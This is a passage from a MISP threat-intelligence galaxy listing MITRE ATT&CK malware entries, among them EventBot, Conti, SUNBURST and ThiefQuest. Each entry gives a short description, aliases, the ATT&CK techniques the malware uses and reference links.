
The tag is: misp-galaxy:mitre-malware="EventBot - S0478"

EventBot - S0478 is also known as:

EventBot

View relationships graph

EventBot - S0478 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"

Table 5119. Table References
Links
https://attack.mitre.org/software/S0478
https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born

Kessel - S0487

[Kessel](https://attack.mitre.org/software/S0487) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://attack.mitre.org/software/S0487) has been active since its C2 domain began resolving in August 2018.(Citation: ESET ForSSHe December 2018)

The tag is: misp-galaxy:mitre-malware="Kessel - S0487"

Kessel - S0487 is also known as:

Kessel

View relationships graph

Kessel - S0487 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 5120. Table References
Links
https://attack.mitre.org/software/S0487
https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf

Dacls - S0497

[Dacls](https://attack.mitre.org/software/S0497) is a multi-platform remote access tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least December 2019.(Citation: TrendMicro macOS Dacls May 2020)(Citation: SentinelOne Lazarus macOS July 2020)

The tag is: misp-galaxy:mitre-malware="Dacls - S0497"

Dacls - S0497 is also known as:

Dacls

View relationships graph

Dacls - S0497 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 5121. Table References
Links
https://attack.mitre.org/software/S0497
https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/
https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

WolfRAT - S0489

[WolfRAT](https://attack.mitre.org/software/S0489) is malware based on a leaked version of [Dendroid](https://attack.mitre.org/software/S0301) that has primarily targeted Thai users. [WolfRAT](https://attack.mitre.org/software/S0489) has most likely been operated by the now defunct organization Wolf Research.(Citation: Talos-WolfRAT)

The tag is: misp-galaxy:mitre-malware="WolfRAT - S0489"

WolfRAT - S0489 is also known as:

WolfRAT

View relationships graph

WolfRAT - S0489 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 5122. Table References
Links
https://attack.mitre.org/software/S0489
https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html

Cryptoistic - S0498

[Cryptoistic](https://attack.mitre.org/software/S0498) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032).(Citation: SentinelOne Lazarus macOS July 2020)

The tag is: misp-galaxy:mitre-malware="Cryptoistic - S0498"

Cryptoistic - S0498 is also known as:

Cryptoistic

View relationships graph

Cryptoistic - S0498 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 5123. Table References
Links
https://attack.mitre.org/software/S0498
https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

Hancitor - S0499

[Hancitor](https://attack.mitre.org/software/S0499) is a downloader that has been used by [Pony](https://attack.mitre.org/software/S0453) and other information stealing malware.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)

The tag is: misp-galaxy:mitre-malware="Hancitor - S0499"

Hancitor - S0499 is also known as:

Hancitor
Chanitor

View relationships graph

Hancitor - S0499 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Verclsid - T1218.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 5124. Table References
Links
https://attack.mitre.org/software/S0499
https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/
https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html

CHEMISTGAMES - S0555

[CHEMISTGAMES](https://attack.mitre.org/software/S0555) is a modular backdoor that has been deployed by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CYBERWARCON CHEMISTGAMES)

The tag is: misp-galaxy:mitre-malware="CHEMISTGAMES - S0555"

CHEMISTGAMES - S0555 is also known as:

CHEMISTGAMES

View relationships graph

CHEMISTGAMES - S0555 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native Code - T1575" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

Table 5125. Table References
Links
https://attack.mitre.org/software/S0555
https://www.youtube.com/watch?v=xoNSbm1aX_w

BusyGasper - S0655

[BusyGasper](https://attack.mitre.org/software/S0655) is Android spyware that has been in use since May 2016. There have been less than 10 victims, all who appear to be located in Russia, that were all infected via physical access to the device.(Citation: SecureList BusyGasper)

The tag is: misp-galaxy:mitre-malware="BusyGasper - S0655"

BusyGasper - S0655 is also known as:

BusyGasper

View relationships graph

BusyGasper - S0655 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Call Control - T1616" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="User Evasion - T1618" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

Table 5126. Table References
Links
https://attack.mitre.org/software/S0655
https://securelist.com/busygasper-the-unfriendly-spy/87627/

Raindrop - S0565

[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)

The tag is: misp-galaxy:mitre-malware="Raindrop - S0565"

Raindrop - S0565 is also known as:

Raindrop

View relationships graph

Raindrop - S0565 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 5127. Table References
Links
https://attack.mitre.org/software/S0565
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

Conti - S0575

[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service that was first observed in December 2019, and has being distributed via [TrickBot](https://attack.mitre.org/software/S0266). It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)

The tag is: misp-galaxy:mitre-malware="Conti - S0575"

Conti - S0575 is also known as:

Conti

View relationships graph

Conti - S0575 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 5128. Table References
Links
https://attack.mitre.org/software/S0575
https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware
https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/
https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/

Kerrdown - S0585

[Kerrdown](https://attack.mitre.org/software/S0585) is a custom downloader that has been used by [APT32](https://attack.mitre.org/groups/G0050) since at least 2018 to install spyware from a server on the victim’s network.(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)

The tag is: misp-galaxy:mitre-malware="Kerrdown - S0585"

Kerrdown - S0585 is also known as:

Kerrdown

View relationships graph

Kerrdown - S0585 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 5129. Table References
Links
https://attack.mitre.org/software/S0585
https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf
https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/

SUNBURST - S0559

[SUNBURST](https://attack.mitre.org/software/S0559) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)

The tag is: misp-galaxy:mitre-malware="SUNBURST - S0559"

SUNBURST - S0559 is also known as:

SUNBURST
Solorigate

View relationships graph

SUNBURST - S0559 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012" with estimative-language:likelihood-probability="almost-certain"

Table 5130. Table References
Links
https://attack.mitre.org/software/S0559
https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

ThiefQuest - S0595

[ThiefQuest](https://attack.mitre.org/software/S0595) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://attack.mitre.org/software/S0595) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.(Citation: Reed thiefquest fake ransom) Even though [ThiefQuest](https://attack.mitre.org/software/S0595) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)

The tag is: misp-galaxy:mitre-malware="ThiefQuest - S0595"

ThiefQuest - S0595 is also known as:

ThiefQuest
MacRansom.K
EvilQuest

View relationships graph

ThiefQuest - S0595 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 5131. Table References
Links
https://attack.mitre.org/software/S0595
https://blog.malwarebytes.com/detections/osx-thiefquest/
